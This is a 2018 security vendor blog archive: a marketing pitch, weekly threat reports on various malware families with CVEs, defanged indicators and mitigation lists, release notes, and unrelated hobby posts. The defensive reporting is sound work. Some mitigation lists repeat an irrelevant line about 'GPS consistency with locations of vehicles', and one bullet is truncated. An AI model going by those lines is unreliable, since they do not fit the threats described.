It’s dangerous to go alone. That must be a reason birds have evolved to flock together. I imagine, as a person responsible for your organization’s security operations, the pressure is on for you to always be right. One miss could become a very public incident that distracts the company from its real mission like financial services, education, or energy. When you’re sitting down to review a possible breach, wouldn’t it make you more confident to have access to real-time, qualified (by trained security analysts in our managed SOC) intelligence sightings from your industry peers that include how similar sightings were ultimately dispositioned?

Of course, you could always go alone, but the cost of creating and maturing a corporate security team can be expensive. For compliance, you’d need to invest in multiple security products to cover network security, system security, application security, vulnerability scanning, SIEM, and of course, the threat intelligence that drives it all. You’re smart so you’ll pick products that integrate. But integration might cost extra.

You’ll also need a team to operate all the products, which eats up your training budget. SIEM’s and IDS’ don’t come with content so you’ll need licenses to intelligence feeds and/or membership to an ISAC. You may also need a threat intelligence platform (TIP) to manage intelligence feeds and plug them into each security product. To staff a 247 SOC you could squeeze by with four threat analysts working 10-hour shifts, but that doesn’t leave you enough coverage for holidays, PTO, and, sick days. This can result in analyst burn out and employee churn. Qualified analysts are hard to find, not just in your area. If you don’t monitor the security products diligently, you could end up like Target. The bare-bones, go it alone security program I outlined could take a year to setup and cost over 1.5 million annually, depending on products, staffing, and business location. This may seem like a lot, but the cost of a breach could be double.

Perch helps with a number of these challenges. With Perch you don’t have to worry about connecting the dots between your intelligence feeds, your Perch products, or the security products you’re feeding into Perch. Don’t worry about the TIP, it’s already included with Perch. Perch pipelines threat feeds to threat detectors as a core feature. No middleware required. Perch’s predictable pricing scales with your node count and you’ll never have to add headcount as you grow. You can add security expertise to your organization without renting more office space. With Perch’s managed SOC, best-effort analysis is always included. We alert your team if we think incident response is required and provide remediation advice. Otherwise, your team is free to focus on mission-critical business.

Perch brings real-time network, application, and system events into one hunt stack. Our SOC is able to compare your traffic and sighting history to your peers in the community to make informed decisions about the fidelity of a threat or piece of intel. When you can see further, the table flips on the attacker. Now every time black hats try to rob the bank they will have to evade your hired posse of keyboard cowboys from Texas. One slip-up and the team is alert.

Cybersecurity can be cumbersome and costly if you are uninformed about what products you should buy, and more importantly the threats that exist. Don’t go alone - Use threat intelligence to your advantage. Perch connects you to sharing communities that provide security, knowledge, and most importantly supported data to protect your entire network no matter the size. With Perch you get a simple to use application that is setup with no costly developments and no down time. Unlock the cheat codes to cybersecurity with Perch!

Threat Report Tuesday September 18th 2018

on September 18, 2018

In this week’s threat report we’re covering two stories, the discovery of XBash malware and an unground marketplace offering a compromised bank ATM and three different companies’ company websites for sale.

XBash Malware Discovered

Researchers have discovered XBash, a malware with ransomware, botnet, and coin-mining functionalities. According to their research, XBash abuses weak passwords and unpatched vulnerabilities and is capable of spreading rapidly within an organization’s network. Researchers found that XBash targets Linux-based systems specifically for its ransomware and botnet capabilities, and targets Microsoft Windows-based systems primarily for its coin-mining and self-propagating capabilities. While XBash has ransomware functionality, researchers found no evidence to suggest that XBash would restore data after the ransom is paid.

At the time of report, researchers had observed 48 incoming transactions associated with the malware with a total income of 0.964 bitcoins, indicating that victims had paid roughly $6,000 total. XBash was first developed in Python and then converted into self-contained Linux ELF executables by abusing the legitimate tool PyInstaller for distribution. Instead of generating random IP addresses as scanning destinations like many other botnets, XBash instead retrieves both IP addresses and domain names from its C2 servers for service probing and exploiting. XBash can also scan for vulnerable servers within an enterprise intranet; however, researchers have only observed this functionality in collected samples and have yet to see it in action.



  • Blocks emails from:
    • backupdatabase@pm[.]me
    • backupsql@pm[.]me
    • backupsql@protonmail[.]com
  • Using strong, non-default passwords
  • Keeping up-to-date on security updates
  • Implement endpoint security on Microsoft Windows and Linux systems
  • Prevent access to unknown hosts on the internet (to prevent access to command and control servers)
  • Implement and maintaining rigorous and effective backup and restoration processes and procedures.

BigPetya Offers Compromised ATM for Sale

Perchy monitors many marketplaces for threat leads, and a compromised ATM for rent caught our eye. Lampeduza, aka BigPetya, a member of multiple underground forums, is selling access to an ATM belonging to a Nigerian bank for $25,000. The actor is also selling access to three different company websites. The first is, an online store linked to 1,000 PCs, available for the price $5,000. The second is, a company with 500-900 connected computers and a server, available for $4,000, and the last is, available for $10,000. Compromised sites are often leveraged in other attacks. If you start to see these domains pop up in your logs you may want to take a closer look even though the sites appear legitimate and do not have a negative reputation.


  • Monitor your ATM network and system activity for signs of compromise and infection.
  • Monitor these domains and IPs for phishing, scanning, or malware hosting activities.
    • dizucar[.]com -
    • www[.]enel[.]com -
    • californiaoliveranch[.]com -

Adding Threat Communities

on September 12, 2018

Perch Security connects you to all your threat intel sources (so you can actually use them). CISO Wes Spencer shows you how, with his typical panache.

Threat Report Tuesday September 11th 2018

on September 11, 2018

In this weekly threat report, we’ll cover two topics, 380K British Airways users skimmed by Magecart breach and the Mirai/Gafgyt botnets get upgraded to fly first class with Apache Struts & SonicWall Exploits.

Mirai & Gafgyt get an upgrade

Security researchers uncovered two botnet variants of Mirai and Gafgyt(BASHLITE) with upgraded versions to take advantage of vulnerabilities. Both IoT botnets are associated with DDoS campaigns since November 2016. The Gafgyt version exploits the SonicWall vulnerability (CVE-2018-9866) that affects older unsupported SonicWall Global Management Systems(GMS 8.1 and older).

The Mirai version exploits the same Apache Struts Vulnerability (CVE-2017-5638) associated with the Equifax data breach in 2017 together with 15 other vulnerabilities. These vulnerabilities include Linksys E-Series devices(Remote Code Execution), Avcron NVR Devices(Remote Command Execution), D-Link devices(D-Link RCE), CCTVs & DVRs from 70 vendors(Remote Code Execution), EnGenius EnShare IoT Gigabit Cloud Service 1.4.11(Remote Code Execution), AVTECH IP Camera/NVR/DVR Devices(Unauthenticated Command Injection), Zyxel routers(CVE-2017-6884), NetGain Enterprise Manager7.2.562(Ping Command Injection), NUUO NVRmini 2 3.0.8(OS Command Injection), DGN1000 Netgear routers(Unauthenticated RCE), D-Link devices(HNAP SoapAction-Header Command Execution), D-Link DSL-2750B(OS Command Injection), MVPower DVR(JAWS Webserver authenticated shell command execution), and Dasan GPON routers(CVE-2018-10561, CVE-2018-10562).

Researchers noted that this is the first time the Mirai botnet has targeted a vulnerability in Apache Struts. Researchers have pointed out that the incorporation of exploits targeting Apache Struts and SonicWall could indicate the threat actors are increasingly targeting outdated enterprise devices.


Mitigation Strategies:

  • Keep device firmware and software up to date.
  • Regularly perform network scans for vulnerable devices.
  • Monitor your devices for network traffic that indicates successful exploit.

British Airways skimmed by Magecart

British Airways recently announced that it suffered a major breach that resulted in customer data theft that impacted roughly 380,000 customers. Names, addresses, email addresses, and payment details of customers with completed transactions from 22:58 BST on August 21 until 21:45 BST on September 5 were compromised. The breach surprisingly didn’t impact passport numbers and other travel data.

Researchers revealed how Magecart threat actor was able to hack the British Airways, like the Ticketmaster breach. As reported, data was stolen directly from the website and mobile app which carries payment forms. Researchers suspect that Magecart used cross-site scripting attack in British Airways’ poorly secured web page component and injected their skimmer code, altering the victim’s site behavior. The attack was tailor-made for the British Airways’ payment page.

Evidence was found that Magecart might have breached the British Airways site days before the skimming began. The attacker’s server used a certificate that was issued on August 15th, days before the reported stardate of August 21, 2018. Researchers warn Magecart uses custom-built attacks for targeted victims, which is a real threat for online payment processing.

Magecart has likely considered other airlines as targets and this is not the first breach in the aviation sector. Aviation sector businesses should consider community defense and evaluate membership in information sharing and analysis centers like A-ISAC.




Mitigation Strategies:

  • Keep web applications components up to date.
  • Regularly scan your web applications for vulnerable components or unauthorized changes.
  • Monitor your web applications via network and log to for indicators of compromise and successful attacks.

Communities Tab: Evaluating Your Threat Intel Sources

on September 4, 2018

See all your threat intelligence sources, compare performance, and predict trends on Perch's Communities tab. Perch Security CISO Wes Spencer deftly demonstrates in this short video.

Threat Report Tuesday August 28th 2018

on August 28, 2018

Ryuk ransomware campaign targeting large organizations in the US and around the world has made the attackers behind it over $640,000 in bitcoin in the space of just two weeks. It appears to be connected to Lazarus, the hacking group working out of North Korea. Ryuk campaign is targeting enterprises that are capable of paying a lot of money in order to get back on track.

Secondly, Security researchers at Kaspersky Lab have uncovered a new campaign dubbed as “AppleJeus” being carried out by North Korean APT group Lazarus. Highly active in recent months, researchers note that this is the first time the threat group not only targeted Windows Systems but also targeted and developed macOS-based FallChill malware. The breach was sourced back to an email to an unsuspecting employee of the cryptocurrency exchange company that downloaded third-party legitimate-looking Celas Trade Pro, a cryptocurrency trading program developed by Celas.

Malware: Ryuk ransomware

It first emerged in mid-August and in the space of just days infected several organizations across the US, encrypting PCs and storage and data centers of victims and demanded huge Bitcoin ransoms. The attacks are highly targeted to such an extent that the perpetrators are conducting tailored campaigns involving extensive network mapping, network compromise and credential stealing in order to reach the end goal of installing Ryuk and encrypting systems.

For more information there are a few links below:



Some Mitigation Strategies:

  • File Integrity Management (FIM) to monitor for the download of a malicious files
  • Intrusion detection systems (IDS) would detect additional payload downloads
  • A solid Backup strategy for easy restore as not to disrupt business operations
  • 24x7 Security Monitoring for malicious behavior and immediate incident response

Malware: AppleJeus

The malware checks if it’s worth attacking. It runs an auto-Updater which contacts the C&C Server to download and run additional executables including the payload, Fallchill backdoor. In turn, Fallchill malware can secretly take over the victim’s computer and carry out cryptocurrency mining. Researchers suspects Celas is a fake company created by the North Koreans. Researchers believe that a Linux version of the malware might have been circulating already, if not in development.

For more information there are a few links below:



Some Mitigation Strategies:

  • Intrusion detection systems (IDS) to monitor for communication to the C2 network
  • Email filtration to find malicious attachments
  • FIM looking for the downloaded executables related to the fallchill backdoor
  • 24x7 Security Monitoring to check for GPS consistency with locations of vehicles

Release Notes

August 24, 2018

  • Added the ability to change an alert from “Escalated” to another status from the Dashboard
  • Added the time remaining to triage an alert and fulfill the applied SLA for MSSP users
  • Added SLA management for MSSP users
  • Added webhook support for Alerts ( Beta )
  • Added MS-ISAC and NCU-ISAO communities ( Beta )

  • The new and improved Alerts list is now live and the old Alerts list has been removed

Threat Report Thursday August 23rd 2018

on August 23, 2018

In August 2018, a new variant of malware - KeyPass ransomware - gained traction using new techniques like manual control to customize its encryption process. Researchers at Kaspersky Lab say that the trojan is being propagated by means of fake installers that download the ransomware module. The trojan sample is written in C++ and compiled in MS Visual Studio. It was developed using the libraries MFC, Boost and Crypto++. The PE header contains a recent compilation date.

Security researchers at Proofpoint recently discovered a new malware strain dubbed Marap. The malware is being distributed via spam emails containing malicious attachments. Based on the campaign’s pattern, Proofpoint linked it to Necurs. Marap can be used to download other malwares. Bleeping Computer states that Marap infects victims, fingerprints their systems, and sends this information back to a central command and control (C&C) server.

Malware: KeyPass Ransomware

KeyPass enumerates local drives and network shares accessible from the infected machine and searches for all files, regardless of their extension. Many ransomware species hunt documents with specific extensions, but this one bypasses only a few folders. Every encrypted file gets an additional extension: “.KEYPASS” and ransom notes named “!!! KEYPASS_DECRYPTION_INFO!!!.txt” are saved in each processed directory. In just 36 hours — from the evening of August 8 to August 10 — the ransomware cropped up in more than 20 countries. Brazil and Vietnam were the hardest hit, but it claimed victims in Europe and Africa.

For more information there are a few links below:



Some Mitigation Strategies:

  • File Integrity Management (FIM) to monitor for the download of a malicious .keypass or .txt
  • Intrusion detection systems (IDS) would detect additional payload downloads
  • A solid Backup strategy for easy restore as not to disrupt business operations
  • 24x7 Security Monitoring for malicious behavior and immediate incident response

Malware: Marap

As for the malspam campaigns pushing the new Marap downloader, Proofpoint says it has observed various versions. Researchers have seen campaigns leveraging . IQY files, PDF documents with embedded IQY files, password-protected ZIP archives, and the classic Word docs with embedded macros. The malware also has basic features to detect virtual machines used for malware analysis though not as complex compare to other malwares.



Some Mitigation Strategies:

  • Intrusion detection systems (IDS) to monitor for communication to the C2 network over http
  • Web filter to block the outgoing http traffic
  • Email filtration to find malicious attachments related to Marap
  • FIM looking for the downloaded .zip file containing a .iqy file or MS word doc with macros
  • 24x7 Security Monitoring to check for GPS consistency with locations of vehicles

Thinking About Your Cybersecurity Program

on August 21, 2018

The National Institute of Technology and Standards, or NIST was tasked with developing a framework that could be used to understand and manage cybersecurity defenses. So, in good government fashion they came up with a 56 page document full of dense text and tables and so on. But – and this is the important part – they summarized it into 5 functions, each a different high level action step. And that provides a good jumping off place to start thinking about a cybersecurity program for your business.

We’ve come up with 20 questions, none of them really technical, that can help you start or accelerate the development of your cybersecurity defenses. As you think through these questions, a framework that fits your business should start to emerge.

Identify cybersecurity threats

  • What are your highest value assets?
  • What assets may be valuable to others?
  • Who would be interested in your assets, and why?
  • How could an adversary steal or compromise those assets?

Protect the system

  • How do you manage users’ activity?
  • How do you protect your data and digital assets?
  • How do you protect your network?
  • How do you protect your endpoint devices?

Detect threats in a timely manner

  • What needs to be monitored?
  • How will you monitor it?
  • Who will be accountable for monitoring?
  • How is a detected threat handled?

Respond to detected threats

  • How are threats assessed?
  • How do you determine the impacts?
  • What plans are in place to respond?
  • Are there physical assets that could be impacted?

Recover from an incident

  • How will you recover lost or compromised assets?
  • Have you made a recovery plan, and has it been tested?
  • Who will be accountable for recovery?
  • How will internal and external communications be handled?

If you address these broad questions in terms of; People, Process, and Technology you will get a pretty clear picture of your situation. Some answers may be more people or technology focused but keep all three facets in mind for each answer.

This is a great way to build a basic cybersecurity program. Start by answering the questions for the way things are now. Some gaps will show up - they always do – and use those gaps to determine the most important things to work on and how to improve.

And if you want to skip right to the sleep aid section of the NIST Cybersecurity Framework, here’s a link to the full document: Nist. There is a lot more to the whole framework and I hope to be able to post some more about how to make it effective in the real world of never enough time resources, but that means I will need time and resources.

Threat Report Thursday August 16th 2018

on August 16, 2018

New Zombie Boy Crypto miner Discovered. Security Researcher James Quinn has recently discovered a new monero miner worm that appears to amass $1,000 per month and uses multiple exploits to avoid detection. Unlike MassMiner crypto currency miner, ZombieBoy leverages WinEggDrop instead of MassScan to search for new hosts to infect. Secondly, Security researchers at Check Point have revealed at DefCon 26 that a cyber criminal can infiltrate a network using a vulnerability of a fax machine protocol. Using only a fax number, an all-in-one printer-fax machine can be penetrated through Faxploit and have access to the network. The attackers just needs to send a malicious fax to a vulnerable fax machine to have access. Researchers note that attackers can then steal printed documents, mine Bitcoin, or practically anything the attacker can think of.

Malware: Zombie Boy Crypto

The tool also utilizes DoublePulsar and EternalBlue exploits to remotely install the main dll. Quinn states that the 64.exe module downloaded by ZombieBoy uses the DoublePulsar exploit to install both an SMB backdoor as well as an RDP backdoor. According to Quinn’s findings, ZombieBoy is being updated on a daily basis, and the malware will not run if it detects it is in a virtual machine environment, debilitating researchers’ ability to reverse engineer and analyze it. The miner uses Simplified Chinese language, indicating that the author may be Chinese.

For more information there are a few links below:



Some Mitigation Strategies:
- File Integrity Management (FIM) to monitor for the download of a malicious .dll files
- Intrusion detection systems (IDS) would detect peer to peer communications
- Web Filtration would block or alert on outbound communication to posthash/
- 24x7 Security Monitoring for malicious behavior and immediate incident response

Malware: Vulnerability of a fax machine protocol

All IoT devices connected to the fax-printer such as server, router, workstations, laptops, or mobile devices would be vulnerable to the attack. Check Point collaborated with HP and used an HP Officejet Pro 6830 all-in-one printer as a test case. They were able to use EternalBlue to exploit the PCs connected to the network, and exfiltrated data by sending back a fax. Researchers collaborated with HP to provide a patch and was rolled out as an automatic update to customers. Researchers advises to check for available firmware updates and disconnect the PSTN line from the fax machine if not in use.



Some Mitigation Strategies:
- Segment Office Equipment network traffic to a single segment to easily monitor
- Intrusion detection systems (IDS) to monitor for broadcast from the fax machine
- Use netflow to monitor outbound traffic from your office equipment
- 24x7 Security Monitoring to check for GPS consistency with locations of vehicles

Threat Report Thursday August 9th 2018

on August 9, 2018

Security researchers at Proofpoint have uncovered Dreambot malware which is a new variant of Ursinif banking Trojan. Though it is still in development, it was seen spreading since July 2016 through exploit kits such as Neutrino, through phishing emails with malicious attachments, and through malvertising. Secondly Palo Alto researchers discovered a threat group named DarkHydrus carrying out credential harvesting attacks using weaponized Word documents, which they delivered via spear-phishing emails to entities within government and educational institutions in the Middle East. Based on the analysis, DarkHydrus used the open-source Phishery tool to host the command and control server to harvest credentials. The use of Phishery further illustrates Dark Hydrus’ reliance on open source tools to conduct their operations.

Malware: Dreambot

Researchers point out that this new variant has new capabilities which includes peer-to-peer (P2P) functionality and Tor communication capability. This Tor-enabled versions are hard to detect because of encrypted and anonymized communications.

For more information there are a few links below:



Some Mitigation Strategies:

  • File Integrity Management (FIM) to monitor for the download of a zipped JavaScript
  • Intrusion detection systems (IDS) would detect peer to peer communications
  • Intrusion detection systems (IDS) would
  • 24x7 Security Monitoring for malicious behavior and immediate incident response

Malware: DarkHydrus

Two Word documents using the domain to harvest credentials were found. These related Word documents were first seen in September and November 2017, which suggests that DarkHydrus has been carrying out this credential harvesting campaign for almost a year.



Some Mitigation Strategies:

  • Web filtration to block
  • Email filtration to detect spear phishing attempts using word files
  • File Integrity Management (FIM) to monitor for downloaded malicious word documents
  • Intrusion detection systems (IDS) to monitor for malicious queries through DNS
  • 24x7 Security Monitoring to check for GPS consistency with locations of vehicles

Perch Security Dashboard Overview

on August 7, 2018

We all need a snapshot of what's happening before we delve in. Perch Security CISO Wes Spencer shows off Perch's Dashboard, which gives users exactly that.

Threat Report Wednesday August 1st 2018

on August 1, 2018

According to Trend Micro, a new exploit kit UnderMiner contains features that make it difficult for researchers to track it and reverse engineer its payloads. Trend Micro researchers state that the exploit kit is currently being used against victims in Asian countries, primarily users in Japan. Underminer delivers a bootkit that infects system boot sectors as well as Hidden Mellifera (Hidden Bee), a cryptocurrency-mining malware. Trend Micro researchers first observed the exploit kit on Jul 17, 2018. Also this week, security researchers at McAfee Labs have recently identified an increasing number of actors using fileless attacks. These fileless attacks don’t drop a malware on the system, rather they use the tools installed in the system. Researchers note that one fileless threat, CactusTorch, uses “DotNetToJScript” technique that executes custom shellcode on Windows System straight from the memory.

Malware: UnderMiner

UnderMiner is capable of browser profiling and filtering, preventing client revisits, URL randomization, and asymmetric encryption of payloads. Malware is transferred via an encrypted transmission control protocol (TCP) tunnel and packages malicious files with a customized format (much like the ROM file system format), which makes analysis for researchers difficult. Underminer has been observed exploiting three major vulnerabilities: CVE-2015-5119, CVE-2016-0189, and CVE-2018-4878.

For more information there are a few links below:



Some Mitigation Strategies:

File Integrity Management (FIM) to monitor for the creation of files and scripts
Intrusion detection systems (IDS) would detect communication C2 for additional payloads
Web Filtration would detect the use of malicious urls or unknown sites
24x7 Security Monitoring for malicious behavior and immediate incident response.

Malware: DotNetToJScript

DotNetToJScript doesn’t write any .NET assemblies on the system, that lead security softwares to often fail to detect these type of attack. CactusTorch loads and executes malicious . NET assemblies, which are the smallest deployment of an application. Corporate networks and single users alike are vulnerable to this type of attack. Security applications such as McAfee Endpoint Security (ENS) and Host Intrusion Prevention System (HIPS) clients are protected from this type of fileless attack.



Some Mitigation Strategies:

File Integrity Management (FIM) to monitor for wscript.exe, which is only file created
Intrusion detection systems (IDS) to monitor for malicious outbound communication
24x7 Security Monitoring to check for GPS consistency with locations of vehicles.

What we're gonna do right here is go back, wayback...

on July 29, 2018

In 2012 I started dabbling with CMSs and as a Front End Developer whose backend expertise is dropping tables making a site with tons of features out of the box was glorious but the hindrance of using a CMS that no one tells you that you ignore is the constant updating and how vulnerable they are to hacks.

Because of this (version control anyone? and many other reasons) I stopped using CMSs but I still had a few sites I no longer updated running on a CMS (no it’s not wordpress 💩), anyways recently said CMS got hacked and since I didn’t keep the CMS up to date my sites were affected by said hack 😑.

Since I value my videogaming time, I updated the CMS hoping that would make the problem go away quickly (it didn’t 🙄) so now I had to invest some time to fix the issue (bye bye videogames 🤬).

I download my site files, backed up the database and scanned the files with an antivirus and it was going to be impossible time consuming to fix since the site had a ton of 💩 PHP files that were infected with malicious code. (Hackers: 1 Ben: 0)

Since my last backup was non-existant 🤦‍ lost to data corruption 😉 I was faced with deciding to either decommission the sites or find a way to fix them.

Going back

I decided I was not going to let the Hackers win but I didn’t have any usable source files, so what to do? 🤔 Enter the waybackmachine or as I call it my backup solution 😂.

The waybackmachine had a few snapshots of my site 😬 so now it was a matter of finding a way to get a hold of one of the snapshots and I would have the static source files of my site. After a bit of googling I found Github user hartator (you da real MVP son 🙌) made the wayback-machine-downloader a small ruby app that can download waybackmachine snapshots.

Now I was faced with another problem do I really wanna install 💩 Ruby to do this? NOPE. Luckily the wayback-machine-downloader has a dockerfile which means I can just run this app in a docker container and get my site files 👌 which is what I ended up doing.


Wayback-Machine-Downloader in action

The wayback-machine-downloader worked flawlessly. With a working copy of my static site files I could get my site working again (Hackers: 1 Ben: 1), but no I already missed my gaming session invested too much time and figured lets go one step further and lets fix it for good and port the site to my preferred static site generator Hugo.

Hugo All The Things Sites

Since I already have Hugo (if you don’t read here) installed on my computer I just need to create a new Hugo site by running this command in my terminal:

hugo new site mySiteName

Once the site was generated I had to create a theme for my site which I did by running the command:

hugo new theme myThemeName

This generates all the files necessary to theme your site so now all that was left to do was getting my static files into Hugo theme partials.

Hugo Generated Theme Partials

Hugo Generated Theme Partials

So once I’m done copying over my html to the partials and run my site locally I am greeted by this:

Close But No Cigar

Close But No Cigar 😑

Upon further inspection using my browsers dev tools ❤️ we can see we have a few broken asset links no big deal, since we are using the files we downloaded from the wayback-machine-downloader and copied the HTML markup into Hugo which has a different file structure than the files we downloaded we need to fix the paths to our assets in Hugo.

Browser Dev Tools

Apparently the red sea was full of console errors

After using our dev tools we know the problem is our file references in our old files they were under a assets folder, Hugo keeps all its static assets in a static folder.

So in our old files the references were something like this:


Now in Hugo they becomes this:


So I ran a search in all the files to see how bad it was and the results were a mere 1229 occurrences in 226 files 😮 yeah, good thing our code editor has a nifty Replace in Files function 😏.

Replace in Files

VSCode Replace in Files

So after running the Replace In Files function for each of our broken assets now my site looks something like this:

Fixed Assets

Fixed assets, such cool, much wow 😎

So at this point I was more than happy now I had to start making content pages in Hugo and start copying the content of each page into its own .md (Markdown) file. Luckily this particular site only had 16 articles so I decided to do this manually otherwise I would’ve probably reached out to our resident Hulk genius Zach to help me come up with some clever way of accomplishing this. (Hackers: 1 Ben: 2)

After creating all my content pages I started navigating the site locally and noticed the links were not the same as they were on the old site, no bueno as I would have to make 301 redirects for every page in order to avoid affecting my Google page rank. (Hackers: 1 Ben: 1) 😑.

I told you guys Hugo was awesome right? I was not about to do 301 redirects for 16 pages thankfully Hugo has a thing called permalinks. So by adding a permalink to my Hugo config.toml I can solve this issue with a single line of code 😬 all I had to do was match the permalink to the same URL pattern of YYYY/MM/DD/Title I used in the old CMS (Hackers: 1 Ben: 2) 😜, here’s what that looks like:

      blog = "blog/:year/:month/:day/:title/"

After applying the permalink and testing everything locally the site was once again ready to go live, I used these instructions on how to host a Hugo site on Gitlab ❤️ and these instructions on how to use a custom domain on Gitlab Pages with CloudFlare Certificates. So now my site is out of a CMS, is version controlled in Gitlab, has CI/CD and hosted for FREE. (Hackers: 1 Ben: 3) 🎉

So that was my weekend without videogames 😭, I hope yours was better ✌️.

Release Notes

July 27, 2018

  • Added API support for MSSPs and upcoming SLA management
  • Added a new Organization Settings ( Beta )
  • Added specialized rule files for Tiny Form Factor sensors
  • Updated the Escalated Alerts color to a friendlier shade of yellow

  • Fixed a bug when joining communities during the sign up process
  • Fixed a bug with firewall blacklist options on the Alerts ( Beta ) suppression modal
  • Fixed a bug with IPs not populating in the Alerts ( Beta ) False Positive Modal

  • Removed deprecated API endpoints for rule files
  • Updated weekly emails to use an improved, automated process

If we’re gonna get fuzzy, let’s be discrete - Up close and personal with a Minesweeper solver

on July 24, 2018

In 1992, Microsoft released Minesweeper alongside Windows 3.1. We can only imagine the purpose Microsoft originally intended, but most of us know Minesweeper as the worst Cookie Clicker clone ever designed. We’d fire it up and click all over the board until the smiley face turned sad (and dead). Sometimes we’d get pretty far; sometimes wide swaths of the board opened up, and we knew we were probably some kind of genius, fated to discover new physics, or a way to recycle sewage into edible food. Well, until sad face appeared again, boredom grew to disdain, and Chip’s Challenge twinkled its eyes at ya.

Minesweeper 1

I grew to love Minesweeper in my final year of grade school. Because I’d fallen deep into computers from a young age, my high school, hesitating not a single second seizing opportunities to hire less IT staff to foster curiosity, assigned half my day to PC Support, where on occasion I’d be asked to fix a computer. Otherwise, I played a lot of Minesweeper. (And, of course, those LAN multiplayer Halo and Quake 3 demos #millenials)

The rules of Minesweeper are pretty simple. At the start of the game, the board contains a number of mines – this number is displayed prominently. Each cell either contains a mine, or doesn’t. When you click a cell, it reveals either a mine, in which case:

You Loose

Or it can reveal a number (or many numbers). The number represents how many direct neighbors contain a mine, no more, no less. If you click all the cells not containing a mine, you win. That’s all. The rest is icing – such as right-clicking to flag a cell as a mine, which doesn’t contribute to winning or losing at all, and purely aids the player. Enough talk – more pretty pictures. Well, more pictures, at least.

Minesweeper 2 Minesweeper 3

In the first picture, there is a number 1 which has only a single neighbour. By the rules of the game, this neighbour must contain a mine. We flag it, so we remember not to click it.

That was the only place where the obvious choice of action is derived entirely from a single number. We’ve gotta get clever to continue. And so we shall!

Numbers that share neighbours also share information – like, if neighbour X is a mine, it may mean neighbours Y and Z cannot contain mines, and are safe for the clicking. Which, you guessed it, we can take advantage of.

Minesweeper 4

The topmost number 1 touches both neighbours highlighted in blue. Since this #1 means only one of its neighbours has a mine, we can infer that if we knew the location of the mine, the other neighbours could safely be clicked. The same applies to the 1 below it at (2, 1), whose neighbours are highlighted in orange.

See the single orange neighbour not overlapped by the blue? If we were to assume a mine was there, it would mean those two blue neighbours contained 0 mines, safe for the clicking. So we click them. Now the topmost #1 touches no cells, leaving no place for its single mine. Of course, this means the #1 pops out of existence, appearing spontaneously in the bank account balance of some fortunate soul (or Shia LaBeouf’s, setting off a chain of events culminating in the attempted assassination of the US president). Or, we end up clicking a mine and losing the game. It all depends on how strange you believe the universe is.

For the sake of the exposition, we’ll adhere to Occam’s razor, and assume clicking both of the blue-shaded cells leads to certain death. Since we’re forced to click both blues if we flag the orange, we know we can’t flag it without certainly dying. We’ve gotta do the other thing… what was it? …uh, Clicking? Yeah.

Minesweeper 5

This same logic can lead us to flagging a cell, instead of clicking.

Minesweeper 6 Minesweeper 7

Taking it one step further, we can combine information from multiple cells to expose less obvious solutions. In the next example, the #1’s at the bottom left portion touch all but a single neighbour of the #3. We know both of those #1’s combined provide two mines, leaving one mine of #3 unaccounted for. We infer the mine’s location must be in the only neighbour #3 doesn’t share with the #1’s.

Note: cells shaded blue have been right-clicked, and red-shaded cells have been left-clicked.

Minesweeper 8

Using only this rule, we can get pretty far. Much of the time, a single move can open up the board.

Minesweeper 9

That is, until those moves run out.

Well, there is one other general strategy we missed. Our previous strategies relied on one number completely containing all the neighbours of another number. There are some cases where only partial overlap is decisive enough to uncover Deep Truths™ of the board.

Minesweeper 10 Minesweeper 11 Minesweeper 12

The three blue-shaded cells contain exactly one mine. Another way of putting it is: the blue-shaded cells contain a maximum of one mine. This is true, even for the cells overlapping the green – since there is a maximum of one mine, we can effectively treat the two overlappers as a single cell. This leaves only one other place for green’s remaining mine: the bottommost greenie. We flag it, and the board opens up again… at least for a bit.

Minesweeper 13

And then there were no more strategies. Finito. Good day, sir!

Well, of course, no more strategies except for the other ones, which we’ll take a look at next time, before finally accepting the futility of our situation and graphing grasping at straws to milk the board for all she’s worth.

Bonus win gif for you beautiful readers.

Minesweeper 14

Threat Report Tuesday July 23rd 2018

on July 23, 2018

In this week’s report, we are covering two very malicious programs. Security researchers at Kaspersky Labs have discovered Calisto malware, which appears to be a precursor of Proton macOS malware. Researchers found that Calisto was uploaded to VirusTotal in 2016, but remained unnoticed until May 2018. This macOS malware is a backdoor that guises as an Intego’s Mac Internet Security that also asks for the user’s login and password upon installation. It enables the attacker to remotely access the system enabling remote login, screen sharing, configure remote login permissions, and enable hidden “root” account in macOS with a designated password. The second piece of interesting piece of code is Decrypter for Magniber Ransomware that has been recently released. South Korean cybersecurity firm AhnLab created decrypters for some versions of the Magniber ransomware. The Magniber ransomware, which targets only South Korean end-users, was deployed by the Magnitude Exploit Kit as early as October 2017 through malvertisements. Since malvertisements is constantly a threat on the internet, it is possible to see this spread to other financial institutions.

Malware: Calisto Malware

Interestingly, researchers found out that SIP enabled (System Integrity Protection) macOS systems prevent full damage from Calisto malware even if they have root permissions. Researchers say that Calisto malware was created before Apple released SIP security feature. Researchers still do not have any information as of now on how the malware propagates. Mac users should be safe from this malware as long as they enable SIP, update OS to the current version, download from trusted sources, and use a credible antivirus software.

For more information:
Sentinel One
Xuanwu Lab

Some Mitigation Strategies:

  • File Integrity Management (FIM) to monitor for the creation of files related to the RAT
  • Intrusion detection systems (IDS) would detect communication C2 for additional payloads
  • Web Filtration would detect the use of malicious URLs or unknown sites
  • 24x7 Security Monitoring for malicious behavior and immediate incident response

Malware: CVE-2016-0189

Magnitude exploits vulnerabilities concerning memory corruption (CVE-2016-0189) in Internet Explorer. The ransomware is one of the few country- or language-specific ransomware that has been created. As of March 30, affected users can download the decrypter at AhnLab’s website, which website creators state is updated daily.

For more information:
Bleeping Computer

Some Mitigation Strategies:

  • File Integrity Management (FIM) to monitor for the creation of files related to ransomware
  • Intrusion detection systems (IDS) to monitor for malicious communication to C2s
  • Solid Backup strategy to restore from when machine is infected and encrypted
  • 24x7 Security Monitorings to check for GPS consistency with locations of vehicles

Kovter Research and Analysis

on July 19, 2018

Through recent alert analysis, Perch Labs has identified Kovter as malicious code on the rise since January. To truly understand the code, we need to understand its history:

  • Kovter, in 2013, was known as a piece of silent ransomware code that transferred files to an infected host without detection. Throughout 2013 and 2014, it was an effective ransomware that would wait on a system until a certain function would be performed. One of those functions was a popup screen notifying the user of illegal activity, with an interface provided to pay a fine, now known as a ransom.
  • Kovter then evolved into many click fraud campaigns. It would infect hosts and steal data to well architected Command and Control (C2) server architecture.
  • In 2015, Kovter evolved into one of the first file-less piece of malicious code that utilized autorun registry edits. It would embed a JavaScript function into the registry that executes a PowerShell script which then installs multiple binaries.
  • As Kovter continued to evolve, it added to its file-less capabilities by including file-like components and spawning local shells to spread laterally throughout your network.

